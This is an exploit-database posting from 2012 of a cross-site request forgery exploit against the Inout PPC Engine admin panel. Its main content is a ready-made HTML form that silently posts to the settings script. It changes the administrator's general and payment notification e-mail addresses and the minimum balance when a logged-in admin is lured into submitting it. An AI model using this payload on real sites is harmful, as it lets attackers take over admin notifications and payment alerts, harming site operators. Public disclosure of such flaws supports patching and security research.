Inout PPC Engine XSRF (change e-mail address)



EKU-ID: 1630 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Inout PPC Engine XSRF (change e-mail address)
# Author: Jonturk75
# Category:: webapps
# Vendor of Software Link:  http://www.inoutscripts.com/products/inout_ppc_engine/
# Demo site: http://www.inoutdemo.com/inout_ppc_engine/admin/
--------------------------
<form name="form1" method="post" action="ppc-setting-action.php" onSubmit="return check_value()">
<input type="text" value="mail@mail.com" size="30" id="admin_general_notification_email" name="admin_general_notification_email"/></td>
<input type="text" value="mail@mail.com" size="30" id="admin_payment_notification_email" name="admin_payment_notification_email"/></td>
<input type="text" value="20" size="5" id="minimum_acc_balance" name="minimum_acc_balance"/> Kc</td>
<input type="submit" value="Update !" name="Submit"/>
</form>